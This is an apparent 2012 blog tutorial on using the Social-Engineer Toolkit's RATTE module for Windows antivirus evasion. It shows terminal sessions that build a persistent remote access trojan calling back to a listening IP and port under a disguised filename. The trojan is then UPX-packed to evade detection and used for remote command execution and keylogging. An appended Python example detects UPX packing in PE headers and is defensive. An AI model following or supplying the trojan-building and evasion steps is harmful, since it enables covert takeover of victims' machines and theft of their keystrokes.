224 set : windows AV evasion
Posted on 2012-8-25 17:42:59
Start SET
3) Third Party Modules

  set> 3

  [-] Social-Engineer Toolkit Third Party Modules menu.
  [-] Please read the readme/modules.txt for information on how to create your own modules.

  1.  RATTE (Remote Administration Tool Tommy Edition) Create Payload only. Read the readme/RATTE-Readme.txt first
  2.  RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first

  99. Return to the previous menu

  set:modules>

Choose 1 or 2; 2 is Java.

  set:modules>1
  set:modules:webattack> Enter the IP address to connect back on:5.5.5.2 # listening IP
  set:modules:webattack> Port RATTE Server should listen on [8080]:9741 # listening port
  set:modules:webattack> Should RATTE be persistent [no|yes]?:yes  # persistent module, VBS http://d.fuzzexp.org/?p=13#toc-persistence
  set:modules:webattack> Use specifix filename (ex. firefox.exe) [filename.exe or empty]?:dir.exe  # file name
  [-] preparing RATTE...
  [*] Payload has been exported to src/program_junk/ratteM.exe
  set:modules:webattack> Start the ratteserver listener now [yes|no]:yes
  [-] Starting ratteserver...
  Welcome to RATTE
  RATTE is published for education only!
  Use only with written permission of target!
  For more technical information and parts of source code
  check out chapter "B.2 Entwicklung eines Sicherheitspruefprogrammes"
  of "Die Kunst der digitalen Verteidigung"
  -> http://www.cul.de/verteidigung.html
  RATTE Server Menue
  1) list clients
  2) activate client
  3) remove client
  4) remove all clients
  5) remove&delete Client
  99) stop Server
  Choose:

It was saved here:

  Payload has been exported to src/program_junk/ratteM.exe

Compress it:

  root@Dis9Team:/pen/set/src/program_junk# upx ratteM.exe




After running it:

  RATTE Server Menue
  1) list clients  # view sessions
  2) activate client  # connect to a session
  3) remove client  # remove
  4) remove all clients # remove all
  5) remove&delete Client
  99) stop Server

Choose 2) activate client,
then enter the session ID to carry out some operations: CMD, keylogging.




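Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one recognize a fine blade.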
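
For defenders triaging a file like the UPX-compressed executable in the post above, here is an added example (not part of the original post and not SET or RATTE code) that reads a PE section table and reports the default traces UPX leaves. The two sample images are header-only byte strings constructed for this example, and `pe_sections`, `upx_indicators` and `sample_image` are names introduced here.

```python
import struct

UPX_NAMES = {"UPX0", "UPX1"}             # default section names written by UPX
IMAGE_SCN_MEM_EXECUTE = 0x20000000
SECTION_FMT = "<8sIIIIIIHHI"             # one 40-byte section header

def pe_sections(data):
    """Return [(name, virtual_size, raw_size, characteristics)] for a PE image."""
    try:
        if data[:2] != b"MZ":
            raise ValueError("not an MZ executable")
        pe_off, = struct.unpack_from("<I", data, 0x3C)
        if data[pe_off:pe_off + 4] != b"PE\0\0":
            raise ValueError("PE signature missing")
        n_sections, = struct.unpack_from("<H", data, pe_off + 6)
        opt_size, = struct.unpack_from("<H", data, pe_off + 20)
        table = pe_off + 24 + opt_size   # section table follows the optional header
        rows = [struct.unpack_from(SECTION_FMT, data, table + 40 * i)
                for i in range(n_sections)]
    except struct.error as exc:          # truncated or malformed headers
        raise ValueError("truncated PE headers") from exc
    return [(r[0].rstrip(b"\0").decode("latin-1"), r[1], r[3], r[9]) for r in rows]

def upx_indicators(data):
    """List the reasons an image looks UPX-packed; an empty list means none found."""
    hits = []
    for name, vsize, raw, flags in pe_sections(data):
        if name in UPX_NAMES:
            hits.append("section named " + name)
        # UPX0 is the region the stub unpacks into at run time:
        # executable, yet empty on disk. This check does not depend on the name.
        if raw == 0 and vsize > 0 and flags & IMAGE_SCN_MEM_EXECUTE:
            hits.append("executable section %s has no data on disk" % name)
    return hits

def sample_image(sections):
    """Constructed header-only image for the demo; contains no code."""
    opt = b"\0" * 224
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    table = b"".join(struct.pack(SECTION_FMT, n, vs, 0x1000, rs, 0, 0, 0, 0, 0, fl)
                     for n, vs, rs, fl in sections)
    return dos + b"PE\0\0" + coff + opt + table

PACKED = sample_image([(b"UPX0", 0x8000, 0, 0xE0000080), (b"UPX1", 0x4000, 0x3E00, 0xE0000040)])
PLAIN = sample_image([(b".text", 0x2000, 0x2000, 0x60000020), (b".bss", 0x1000, 0, 0xC0000080)])

if __name__ == "__main__":
    print(upx_indicators(PACKED))
    print(upx_indicators(PLAIN))
```

A hit only says the file is packed, which legitimate software also does; treat it as a reason to unpack and inspect the file, not as a verdict.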
